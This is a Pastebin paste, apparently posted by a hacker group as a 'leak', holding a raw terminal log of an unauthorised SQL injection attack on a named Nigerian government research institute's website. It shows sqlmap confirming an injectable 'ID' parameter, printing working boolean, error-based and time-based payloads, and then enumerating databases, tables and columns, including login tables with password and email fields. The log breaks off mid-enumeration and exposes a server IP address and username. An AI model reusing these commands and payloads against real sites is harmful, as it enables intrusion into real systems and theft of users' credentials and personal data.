Advertisement
Guest User

Untitled

a guest
Aug 28th, 2017
945
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 61.58 KB | None | 0 0
  1.  
  2. ~~~LEAKED NIGERIAN BUILDING AND ROAD SEARCH INSTITUTE~~
  3. ~GARUDA SECURITY HACKER~
  4. ~Cr4byP4tty~
  5. login as: helmi
  6. helmi@117.74.120.219's password:
  7. Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-87-generic x86_64)
  8.  
  9. * Documentation: https://help.ubuntu.com
  10. * Management: https://landscape.canonical.com
  11. * Support: https://ubuntu.com/advantage
  12.  
  13. 9 packages can be updated.
  14. 8 updates are security updates.
  15.  
  16.  
  17. Last login: Mon Aug 28 08:50:05 2017 from 125.163.127.135
  18. helmi@BitCoin:~$ sudo su
  19. [sudo] password for helmi:
  20. root@BitCoin:/home/helmi# sqlmap -u http://www.nbrri.gov.ng/sites/news.php?ID=57 --dbs
  21. _
  22. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  23. |_ -| . | | | .'| . |
  24. |___|_ |_|_|_|_|__,| _|
  25. |_| |_| http://sqlmap.org
  26.  
  27. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  28.  
  29. [*] starting at 08:22:19
  30.  
  31. [08:22:21] [INFO] testing connection to the target URL
  32. [08:22:23] [INFO] heuristics detected web page charset 'ISO-8859-2'
  33. [08:22:23] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
  34. [08:22:24] [INFO] testing if the target URL is stable
  35. [08:22:25] [INFO] target URL is stable
  36. [08:22:25] [INFO] testing if GET parameter 'ID' is dynamic
  37. [08:22:26] [WARNING] GET parameter 'ID' does not appear dynamic
  38. [08:22:27] [INFO] heuristic (basic) test shows that GET parameter 'ID' might be injectable (possible DBMS: 'MySQL')
  39. [08:22:27] [INFO] testing for SQL injection on GET parameter 'ID'
  40. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
  41. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
  42. [08:22:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  43. [08:22:31] [WARNING] reflective value(s) found and filtering out
  44. [08:22:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  45. [08:23:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  46. [08:23:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
  47. [08:24:01] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
  48. [08:24:05] [INFO] GET parameter 'ID' seems to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
  49. [08:24:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
  50. [08:24:06] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
  51. [08:24:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  52. [08:24:07] [INFO] GET parameter 'ID' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
  53. [08:24:07] [INFO] testing 'MySQL inline queries'
  54. [08:24:08] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
  55. [08:24:09] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
  56. [08:24:09] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
  57. [08:24:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  58. [08:24:10] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
  59. [08:24:10] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  60. [08:24:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
  61. [08:24:21] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  62. [08:24:21] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
  63. [08:24:32] [INFO] GET parameter 'ID' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
  64. [08:24:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  65. [08:24:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  66. [08:24:32] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  67. [08:24:34] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  68. [08:24:37] [INFO] target URL appears to have 12 columns in query
  69. injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
  70. [08:26:11] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  71. [08:26:59] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
  72. [08:26:59] [INFO] testing 'MySQL UNION query (67) - 1 to 20 columns'
  73. [08:27:44] [INFO] testing 'MySQL UNION query (67) - 22 to 40 columns'
  74. [08:27:50] [INFO] testing 'MySQL UNION query (67) - 42 to 60 columns'
  75. [08:27:55] [INFO] testing 'MySQL UNION query (67) - 62 to 80 columns'
  76. [08:28:01] [INFO] testing 'MySQL UNION query (67) - 82 to 100 columns'
  77. GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  78. sqlmap identified the following injection point(s) with a total of 536 HTTP(s) requests:
  79. ---
  80. Parameter: ID (GET)
  81. Type: boolean-based blind
  82. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  83. Payload: ID=57 RLIKE (SELECT (CASE WHEN (3840=3840) THEN 57 ELSE 0x28 END))
  84.  
  85. Type: error-based
  86. Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  87. Payload: ID=57 AND EXTRACTVALUE(1351,CONCAT(0x5c,0x71717a7171,(SELECT (ELT(1351=1351,1))),0x7178627071))
  88.  
  89. Type: AND/OR time-based blind
  90. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  91. Payload: ID=57 AND (SELECT * FROM (SELECT(SLEEP(5)))gPUK)
  92. ---
  93. [08:28:54] [INFO] the back-end DBMS is MySQL
  94. web application technology: PHP 5.6.31, Apache 2.4.27
  95. back-end DBMS: MySQL 5.1
  96. [08:28:54] [INFO] fetching database names
  97. [08:28:54] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  98. [08:28:55] [INFO] the SQL query used returns 2 entries
  99. [08:28:55] [INFO] retrieved: information_schema
  100. [08:28:55] [INFO] retrieved: nbrrigov_123
  101. available databases [2]:
  102. [*] information_schema
  103. [*] nbrrigov_123
  104.  
  105. [08:28:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nbrri.gov.ng'
  106. root@BitCoin:/home/helmi# sqlmap -u http://www.nbrri.gov.ng/sites/news.php?ID=57 -D nbrrigov_123 --tables
  107. _
  108. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  109. |_ -| . | | | .'| . |
  110. |___|_ |_|_|_|_|__,| _|
  111. |_| |_| http://sqlmap.org
  112.  
  113. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  114.  
  115. [*] starting at 08:29:25
  116.  
  117. [08:29:25] [INFO] resuming back-end DBMS 'mysql'
  118. [08:29:26] [INFO] testing connection to the target URL
  119. [08:29:27] [INFO] heuristics detected web page charset 'ISO-8859-2'
  120. sqlmap resumed the following injection point(s) from stored session:
  121. ---
  122. Parameter: ID (GET)
  123. Type: boolean-based blind
  124. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  125. Payload: ID=57 RLIKE (SELECT (CASE WHEN (3840=3840) THEN 57 ELSE 0x28 END))
  126.  
  127. Type: error-based
  128. Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  129. Payload: ID=57 AND EXTRACTVALUE(1351,CONCAT(0x5c,0x71717a7171,(SELECT (ELT(1351=1351,1))),0x7178627071))
  130.  
  131. Type: AND/OR time-based blind
  132. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  133. Payload: ID=57 AND (SELECT * FROM (SELECT(SLEEP(5)))gPUK)
  134. ---
  135. [08:29:27] [INFO] the back-end DBMS is MySQL
  136. web application technology: PHP 5.6.31, Apache 2.4.27
  137. back-end DBMS: MySQL 5.1
  138. [08:29:27] [INFO] fetching tables for database: 'nbrrigov_123'
  139. [08:29:27] [INFO] the SQL query used returns 32 entries
  140. [08:29:28] [INFO] retrieved: annce
  141. [08:29:28] [INFO] retrieved: announcementt
  142. [08:29:28] [INFO] retrieved: anny
  143. [08:29:29] [INFO] retrieved: article
  144. [08:29:29] [INFO] retrieved: category
  145. [08:29:29] [INFO] retrieved: comments
  146. [08:29:29] [INFO] retrieved: country
  147. [08:29:30] [INFO] retrieved: doctype
  148. [08:29:30] [INFO] retrieved: document
  149. [08:29:30] [INFO] retrieved: enquiry
  150. [08:29:31] [INFO] retrieved: events
  151. [08:29:31] [INFO] retrieved: eventtype
  152. [08:29:31] [INFO] retrieved: gallery
  153. [08:29:31] [INFO] retrieved: gendata
  154. [08:29:32] [INFO] retrieved: ggcat
  155. [08:29:32] [INFO] retrieved: hardtechn
  156. [08:29:32] [INFO] retrieved: lga
  157. [08:29:32] [INFO] retrieved: link
  158. [08:29:33] [INFO] retrieved: login
  159. [08:29:33] [INFO] retrieved: login_copy
  160. [08:29:33] [INFO] retrieved: mail
  161. [08:29:34] [INFO] retrieved: menu
  162. [08:29:34] [INFO] retrieved: menugroup
  163. [08:29:34] [INFO] retrieved: nbrrireports
  164. [08:29:34] [INFO] retrieved: news
  165. [08:29:35] [INFO] retrieved: page
  166. [08:29:35] [INFO] retrieved: page_copy
  167. [08:29:35] [INFO] retrieved: parameter
  168. [08:29:36] [INFO] retrieved: role
  169. [08:29:36] [INFO] retrieved: states
  170. [08:29:36] [INFO] retrieved: userdata
  171. [08:29:36] [INFO] retrieved: userlogin
  172. Database: nbrrigov_123
  173. [32 tables]
  174. +---------------+
  175. | parameter |
  176. | annce |
  177. | announcementt |
  178. | anny |
  179. | article |
  180. | category |
  181. | comments |
  182. | country |
  183. | doctype |
  184. | document |
  185. | enquiry |
  186. | events |
  187. | eventtype |
  188. | gallery |
  189. | gendata |
  190. | ggcat |
  191. | hardtechn |
  192. | lga |
  193. | link |
  194. | login |
  195. | login_copy |
  196. | mail |
  197. | menu |
  198. | menugroup |
  199. | nbrrireports |
  200. | news |
  201. | page |
  202. | page_copy |
  203. | role |
  204. | states |
  205. | userdata |
  206. | userlogin |
  207. +---------------+
  208.  
  209. [08:29:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nbrri.gov.ng'
  210. root@BitCoin:/home/helmi# sqlmap -u http://www.nbrri.gov.ng/sites/news.php?ID=57 -D nbrrigov_123 --columns
  211. _
  212. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  213. |_ -| . | | | .'| . |
  214. |___|_ |_|_|_|_|__,| _|
  215. |_| |_| http://sqlmap.org
  216.  
  217. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  218.  
  219. [*] starting at 08:30:00
  220.  
  221. [08:30:00] [INFO] resuming back-end DBMS 'mysql'
  222. [08:30:02] [INFO] testing connection to the target URL
  223. [08:30:04] [INFO] heuristics detected web page charset 'ISO-8859-2'
  224. sqlmap resumed the following injection point(s) from stored session:
  225. ---
  226. Parameter: ID (GET)
  227. Type: boolean-based blind
  228. Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  229. Payload: ID=57 RLIKE (SELECT (CASE WHEN (3840=3840) THEN 57 ELSE 0x28 END))
  230.  
  231. Type: error-based
  232. Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  233. Payload: ID=57 AND EXTRACTVALUE(1351,CONCAT(0x5c,0x71717a7171,(SELECT (ELT(1351=1351,1))),0x7178627071))
  234.  
  235. Type: AND/OR time-based blind
  236. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  237. Payload: ID=57 AND (SELECT * FROM (SELECT(SLEEP(5)))gPUK)
  238. ---
  239. [08:30:04] [INFO] the back-end DBMS is MySQL
  240. web application technology: PHP 5.6.31, Apache 2.4.27
  241. back-end DBMS: MySQL 5.1
  242. [08:30:04] [INFO] fetching tables for database: 'nbrrigov_123'
  243. [08:30:04] [INFO] the SQL query used returns 32 entries
  244. [08:30:04] [INFO] fetching columns for table 'login_copy' in database 'nbrrigov_123'
  245. [08:30:04] [INFO] the SQL query used returns 7 entries
  246. [08:30:05] [INFO] retrieved: ID
  247. [08:30:05] [INFO] retrieved: int(18)
  248. [08:30:05] [INFO] retrieved: username
  249. [08:30:05] [INFO] retrieved: varchar(25)
  250. [08:30:06] [INFO] retrieved: password
  251. [08:30:06] [INFO] retrieved: varchar(100)
  252. [08:30:06] [INFO] retrieved: name
  253. [08:30:07] [INFO] retrieved: varchar(35)
  254. [08:30:07] [INFO] retrieved: email
  255. [08:30:07] [INFO] retrieved: varchar(60)
  256. [08:30:07] [INFO] retrieved: level
  257. [08:30:08] [INFO] retrieved: varchar(25)
  258. [08:30:08] [INFO] retrieved: chk
  259. [08:30:08] [INFO] retrieved: varchar(60)
  260. [08:30:08] [INFO] fetching columns for table 'gendata' in database 'nbrrigov_123'
  261. [08:30:09] [INFO] the SQL query used returns 2 entries
  262. [08:30:09] [INFO] retrieved: table_name
  263. [08:30:09] [INFO] retrieved: varchar(30)
  264. [08:30:09] [INFO] retrieved: table_id
  265. [08:30:10] [INFO] retrieved: int(11)
  266. [08:30:10] [INFO] fetching columns for table 'states' in database 'nbrrigov_123'
  267. [08:30:10] [INFO] the SQL query used returns 2 entries
  268. [08:30:10] [INFO] retrieved: state
  269. [08:30:11] [INFO] retrieved: char(20)
  270. [08:30:11] [INFO] retrieved: capital
  271. [08:30:11] [INFO] retrieved: char(20)
  272. [08:30:11] [INFO] fetching columns for table 'parameter' in database 'nbrrigov_123'
  273. [08:30:11] [INFO] the SQL query used returns 5 entries
  274. [08:30:12] [INFO] retrieved: parameter_name
  275. [08:30:12] [INFO] retrieved: varchar(50)
  276. [08:30:12] [INFO] retrieved: parameter_value
  277. [08:30:12] [INFO] retrieved: varchar(100)
  278. [08:30:13] [INFO] retrieved: privilege_flag
  279. [08:30:13] [INFO] retrieved: char(1)
  280. [08:30:14] [INFO] retrieved: parameter_description
  281. [08:30:14] [INFO] retrieved: varchar(150)
  282. [08:30:14] [INFO] retrieved: created
  283. [08:30:14] [INFO] retrieved: datetime
  284. [08:30:14] [INFO] fetching columns for table 'news' in database 'nbrrigov_123'
  285. [08:30:15] [INFO] the SQL query used returns 12 entries
  286. [08:30:15] [INFO] retrieved: ID
  287. [08:30:15] [INFO] retrieved: int(16)
  288. [08:30:15] [INFO] retrieved: news_id
  289. [08:30:16] [INFO] retrieved: varchar(80)
  290. [08:30:16] [INFO] retrieved: news_title
  291. [08:30:16] [INFO] retrieved: varchar(250)
  292. [08:30:17] [INFO] retrieved: news_summary
  293. [08:30:17] [INFO] retrieved: varchar(350)
  294. [08:30:17] [INFO] retrieved: news_content
  295. [08:30:17] [INFO] retrieved: text
  296. [08:30:18] [INFO] retrieved: news_date
  297. [08:30:18] [INFO] retrieved: date
  298. [08:30:18] [INFO] retrieved: news_source
  299. [08:30:18] [INFO] retrieved: varchar(85)
  300. [08:30:19] [INFO] retrieved: news_pic
  301. [08:30:19] [INFO] retrieved: varchar(80)
  302. [08:30:19] [INFO] retrieved: news_file
  303. [08:30:20] [INFO] retrieved: varchar(80)
  304. [08:30:20] [INFO] retrieved: news_postedby
  305. [08:30:20] [INFO] retrieved: varchar(80)
  306. [08:30:20] [INFO] retrieved: news_display
  307. [08:30:21] [INFO] retrieved: tinyint(1)
  308. [08:30:21] [INFO] retrieved: news_main
  309. [08:30:21] [INFO] retrieved: varchar(5)
  310. [08:30:21] [INFO] fetching columns for table 'category' in database 'nbrrigov_123'
  311. [08:30:22] [INFO] the SQL query used returns 3 entries
  312. [08:30:22] [INFO] retrieved: ID
  313. [08:30:22] [INFO] retrieved: int(18)
  314. [08:30:22] [INFO] retrieved: Category
  315. [08:30:23] [INFO] retrieved: varchar(200)
  316. [08:30:23] [INFO] retrieved: Type
  317. [08:30:23] [INFO] retrieved: varchar(200)
  318. [08:30:23] [INFO] fetching columns for table 'userdata' in database 'nbrrigov_123'
  319. [08:30:24] [INFO] the SQL query used returns 41 entries
  320. [08:30:24] [INFO] retrieved: username
  321. [08:30:24] [INFO] retrieved: varchar(30)
  322. [08:30:24] [INFO] retrieved: password
  323. [08:30:25] [INFO] retrieved: varchar(100)
  324. [08:30:25] [INFO] retrieved: role_id
  325. [08:30:25] [INFO] retrieved: varchar(20)
  326. [08:30:25] [INFO] retrieved: role_name
  327. [08:30:26] [INFO] retrieved: varchar(40)
  328. [08:30:26] [INFO] retrieved: firstname
  329. [08:30:26] [INFO] retrieved: varchar(60)
  330. [08:30:27] [INFO] retrieved: lastname
  331. [08:30:27] [INFO] retrieved: varchar(60)
  332. [08:30:27] [INFO] retrieved: email
  333. [08:30:27] [INFO] retrieved: varchar(100)
  334. [08:30:28] [INFO] retrieved: mobile_phone
  335. [08:30:28] [INFO] retrieved: varchar(20)
  336. [08:30:28] [INFO] retrieved: address
  337. [08:30:28] [INFO] retrieved: text
  338. [08:30:29] [INFO] retrieved: passchg_logon
  339. [08:30:29] [INFO] retrieved: char(1)
  340. [08:30:29] [INFO] retrieved: pass_expire
  341. [08:30:30] [INFO] retrieved: varchar(1)
  342. [08:30:30] [INFO] retrieved: pass_dateexpire
  343. [08:30:30] [INFO] retrieved: date
  344. [08:30:30] [INFO] retrieved: pass_change
  345. [08:30:31] [INFO] retrieved: char(1)
  346. [08:30:31] [INFO] retrieved: user_disabled
  347. [08:30:31] [INFO] retrieved: char(1)
  348. [08:30:32] [INFO] retrieved: user_locked
  349. [08:30:32] [INFO] retrieved: char(1)
  350. [08:30:32] [INFO] retrieved: day_1
  351. [08:30:32] [INFO] retrieved: char(1)
  352. [08:30:33] [INFO] retrieved: day_2
  353. [08:30:33] [INFO] retrieved: char(1)
  354. [08:30:33] [INFO] retrieved: day_3
  355. [08:30:34] [INFO] retrieved: char(1)
  356. [08:30:34] [INFO] retrieved: day_4
  357. [08:30:34] [INFO] retrieved: char(1)
  358. [08:30:34] [INFO] retrieved: day_5
  359. [08:30:35] [INFO] retrieved: char(1)
  360. [08:30:35] [INFO] retrieved: day_6
  361. [08:30:35] [INFO] retrieved: char(1)
  362. [08:30:35] [INFO] retrieved: day_7
  363. [08:30:36] [INFO] retrieved: char(1)
  364. [08:30:36] [INFO] retrieved: pin_missed
  365. [08:30:36] [INFO] retrieved: int(2)
  366. [08:30:37] [INFO] retrieved: last_used
  367. [08:30:37] [INFO] retrieved: datetime
  368. [08:30:37] [INFO] retrieved: created
  369. [08:30:37] [INFO] retrieved: datetime
  370. [08:30:38] [INFO] retrieved: modified
  371. [08:30:38] [INFO] retrieved: datetime
  372. [08:30:38] [INFO] retrieved: authorize_status
  373. [08:30:38] [INFO] retrieved: char(1)
  374. [08:30:39] [INFO] retrieved: user_type
  375. [08:30:39] [INFO] retrieved: char(1)
  376. [08:30:39] [INFO] retrieved: hint_question
  377. [08:30:40] [INFO] retrieved: varchar(100)
  378. [08:30:40] [INFO] retrieved: hint_answer
  379. [08:30:40] [INFO] retrieved: varchar(100)
  380. [08:30:40] [INFO] retrieved: override_wh
  381. [08:30:41] [INFO] retrieved: char(1)
  382. [08:30:41] [INFO] retrieved: extend_wh
  383. [08:30:41] [INFO] retrieved: varchar(11)
  384. [08:30:42] [INFO] retrieved: issuer_code
  385. [08:30:42] [INFO] retrieved: varchar(3)
  386. [08:30:42] [INFO] retrieved: station_code
  387. [08:30:42] [INFO] retrieved: varchar(25)
  388. [08:30:43] [INFO] retrieved: login_status
  389. [08:30:43] [INFO] retrieved: char(1)
  390. [08:30:43] [INFO] retrieved: acct_no
  391. [08:30:43] [INFO] retrieved: varchar(20)
  392. [08:30:44] [INFO] retrieved: posted_user
  393. [08:30:44] [INFO] retrieved: varchar(40)
  394. [08:30:44] [INFO] retrieved: activation_status
  395. [08:30:45] [INFO] retrieved: tinyint(1)
  396. [08:30:45] [INFO] retrieved: login_history
  397. [08:30:45] [INFO] retrieved: text
  398. [08:30:45] [INFO] retrieved: ip_history
  399. [08:30:46] [INFO] retrieved: text
  400. [08:30:46] [INFO] retrieved: sch_code
  401. [08:30:46] [INFO] retrieved: varchar(50)
  402. [08:30:46] [INFO] fetching columns for table 'page_copy' in database 'nbrrigov_123'
  403. [08:30:47] [INFO] the SQL query used returns 14 entries
  404. [08:30:47] [INFO] retrieved: id
  405. [08:30:47] [INFO] retrieved: int(24)
  406. [08:30:47] [INFO] retrieved: Pagetitle
  407. [08:30:48] [INFO] retrieved: varchar(80)
  408. [08:30:48] [INFO] retrieved: Mainpage
  409. [08:30:48] [INFO] retrieved: varchar(100)
  410. [08:30:48] [INFO] retrieved: linktype
  411. [08:30:49] [INFO] retrieved: varchar(100)
  412. [08:30:49] [INFO] retrieved: linkorder
  413. [08:30:49] [INFO] retrieved: varchar(100)
  414. [08:30:50] [INFO] retrieved: pics1
  415. [08:30:50] [INFO] retrieved: varchar(100)
  416. [08:30:50] [INFO] retrieved: Pics2
  417. [08:30:50] [INFO] retrieved: varchar(100)
  418. [08:30:51] [INFO] retrieved: Maincontent
  419. [08:30:51] [INFO] retrieved: text
  420. [08:30:51] [INFO] retrieved: Content1
  421. [08:30:52] [INFO] retrieved: text
  422. [08:30:52] [INFO] retrieved: Content2
  423. [08:30:52] [INFO] retrieved: text
  424. [08:30:52] [INFO] retrieved: Content3
  425. [08:30:53] [INFO] retrieved: text
  426. [08:30:53] [INFO] retrieved: Display
  427. [08:30:53] [INFO] retrieved: text
  428. [08:30:53] [INFO] retrieved: datecreated
  429. [08:30:54] [INFO] retrieved: date
  430. [08:30:54] [INFO] retrieved: connect
  431. [08:30:54] [INFO] retrieved: varchar(60)
  432. [08:30:54] [INFO] fetching columns for table 'anny' in database 'nbrrigov_123'
  433. [08:30:55] [INFO] the SQL query used returns 7 entries
  434. [08:30:55] [INFO] retrieved: ID
  435. [08:30:55] [INFO] retrieved: int(12)
  436. [08:30:55] [INFO] retrieved: Content
  437. [08:30:56] [INFO] retrieved: text
  438. [08:30:56] [INFO] retrieved: Date
  439. [08:30:56] [INFO] retrieved: date
  440. [08:30:57] [INFO] retrieved: Title
  441. [08:30:57] [INFO] retrieved: varchar(200)
  442. [08:30:57] [INFO] retrieved: pic
  443. [08:30:57] [INFO] retrieved: varchar(100)
  444. [08:30:58] [INFO] retrieved: code
  445. [08:30:58] [INFO] retrieved: varchar(60)
  446. [08:30:58] [INFO] retrieved: display
  447. [08:30:58] [INFO] retrieved: varchar(50)
  448. [08:30:58] [INFO] fetching columns for table 'enquiry' in database 'nbrrigov_123'
  449. [08:30:59] [INFO] the SQL query used returns 4 entries
  450. [08:30:59] [INFO] retrieved: id
  451. [08:30:59] [INFO] retrieved: int(15)
  452. [08:31:00] [INFO] retrieved: Name
  453. [08:31:00] [INFO] retrieved: varchar(60)
  454. [08:31:00] [INFO] retrieved: Email
  455. [08:31:00] [INFO] retrieved: varchar(65)
  456. [08:31:01] [INFO] retrieved: Comment
  457. [08:31:01] [INFO] retrieved: varchar(250)
  458. [08:31:01] [INFO] fetching columns for table 'eventtype' in database 'nbrrigov_123'
  459. [08:31:01] [INFO] the SQL query used returns 2 entries
  460. [08:31:02] [INFO] retrieved: id
  461. [08:31:02] [INFO] retrieved: int(55)
  462. [08:31:02] [INFO] retrieved: category
  463. [08:31:02] [INFO] retrieved: varchar(180)
  464. [08:31:02] [INFO] fetching columns for table 'comments' in database 'nbrrigov_123'
  465. [08:31:03] [INFO] the SQL query used returns 5 entries
  466. [08:31:03] [INFO] retrieved: ID
  467. [08:31:03] [INFO] retrieved: int(18)
  468. [08:31:04] [INFO] retrieved: Name
  469. [08:31:04] [INFO] retrieved: varchar(100)
  470. [08:31:04] [INFO] retrieved: Email
  471. [08:31:04] [INFO] retrieved: varchar(100)
  472. [08:31:05] [INFO] retrieved: comments
  473. [08:31:05] [INFO] retrieved: text
  474. [08:31:05] [INFO] retrieved: visible
  475. [08:31:05] [INFO] retrieved: varchar(120)
  476. [08:31:06] [INFO] fetching columns for table 'role' in database 'nbrrigov_123'
  477. [08:31:06] [INFO] the SQL query used returns 4 entries
  478. [08:31:06] [INFO] retrieved: role_id
  479. [08:31:06] [INFO] retrieved: varchar(5)
  480. [08:31:07] [INFO] retrieved: role_name
  481. [08:31:07] [INFO] retrieved: varchar(60)
  482. [08:31:07] [INFO] retrieved: role_enabled
  483. [08:31:07] [INFO] retrieved: char(1)
  484. [08:31:08] [INFO] retrieved: created
  485. [08:31:08] [INFO] retrieved: datetime
  486. [08:31:08] [INFO] fetching columns for table 'userlogin' in database 'nbrrigov_123'
  487. [08:31:08] [INFO] the SQL query used returns 3 entries
  488. [08:31:09] [INFO] retrieved: ID
  489. [08:31:09] [INFO] retrieved: int(18)
  490. [08:31:09] [INFO] retrieved: Username
  491. [08:31:09] [INFO] retrieved: varchar(49)
  492. [08:31:10] [INFO] retrieved: Password
  493. [08:31:10] [INFO] retrieved: varchar(56)
  494. [08:31:10] [INFO] fetching columns for table 'mail' in database 'nbrrigov_123'
  495. [08:31:10] [INFO] the SQL query used returns 3 entries
  496. [08:31:11] [INFO] retrieved: id
  497. [08:31:11] [INFO] retrieved: int(18)
  498. [08:31:11] [INFO] retrieved: name
  499. [08:31:11] [INFO] retrieved: varchar(60)
  500. [08:31:12] [INFO] retrieved: email
  501. [08:31:12] [INFO] retrieved: varchar(80)
  502. [08:31:12] [INFO] fetching columns for table 'document' in database 'nbrrigov_123'
  503. [08:31:12] [INFO] the SQL query used returns 9 entries
  504. [08:31:13] [INFO] retrieved: ID
  505. [08:31:13] [INFO] retrieved: int(16)
  506. [08:31:13] [INFO] retrieved: doc_id
  507. [08:31:13] [INFO] retrieved: varchar(40)
  508. [08:31:14] [INFO] retrieved: category
  509. [08:31:14] [INFO] retrieved: varchar(25)
  510. [08:31:14] [INFO] retrieved: document
  511. [08:31:15] [INFO] retrieved: varchar(60)
  512. [08:31:15] [INFO] retrieved: date
  513. [08:31:15] [INFO] retrieved: date
  514. [08:31:15] [INFO] retrieved: doctitle
  515. [08:31:16] [INFO] retrieved: varchar(250)
  516. [08:31:16] [INFO] retrieved: display
  517. [08:31:16] [INFO] retrieved: varchar(10)
  518. [08:31:16] [INFO] retrieved: created
  519. [08:31:17] [INFO] retrieved: datetime
  520. [08:31:17] [INFO] retrieved: officer
  521. [08:31:17] [INFO] retrieved: varchar(40)
  522. [08:31:18] [INFO] fetching columns for table 'events' in database 'nbrrigov_123'
  523. [08:31:18] [INFO] the SQL query used returns 14 entries
  524. [08:31:18] [INFO] retrieved: ID
  525. [08:31:18] [INFO] retrieved: int(18)
  526. [08:31:19] [INFO] retrieved: event_id
  527. [08:31:19] [INFO] retrieved: varchar(40)
  528. [08:31:19] [INFO] retrieved: eventTitle
  529. [08:31:20] [INFO] retrieved: text
  530. [08:31:20] [INFO] retrieved: StartDate
  531. [08:31:20] [INFO] retrieved: date
  532. [08:31:20] [INFO] retrieved: eventDuration
  533. [08:31:21] [INFO] retrieved: varchar(100)
  534. [08:31:21] [INFO] retrieved: eventType
  535. [08:31:21] [INFO] retrieved: varchar(85)
  536. [08:31:22] [INFO] retrieved: content
  537. [08:31:22] [INFO] retrieved: text
  538. [08:31:22] [INFO] retrieved: PaperTitle
  539. [08:31:22] [INFO] retrieved: varchar(256)
  540. [08:31:23] [INFO] retrieved: Author
  541. [08:31:23] [INFO] retrieved: varchar(35)
  542. [08:31:23] [INFO] retrieved: Status
  543. [08:31:23] [INFO] retrieved: varchar(25)
  544. [08:31:24] [INFO] retrieved: file
  545. [08:31:24] [INFO] retrieved: text
  546. [08:31:24] [INFO] retrieved: dateposted
  547. [08:31:25] [INFO] retrieved: date
  548. [08:31:25] [INFO] retrieved: officer
  549. [08:31:25] [INFO] retrieved: varchar(40)
  550. [08:31:25] [INFO] retrieved: Display
  551. [08:31:26] [INFO] retrieved: varchar(5)
  552. [08:31:26] [INFO] fetching columns for table 'announcementt' in database 'nbrrigov_123'
  553. [08:31:26] [INFO] the SQL query used returns 6 entries
  554. [08:31:26] [INFO] retrieved: ID
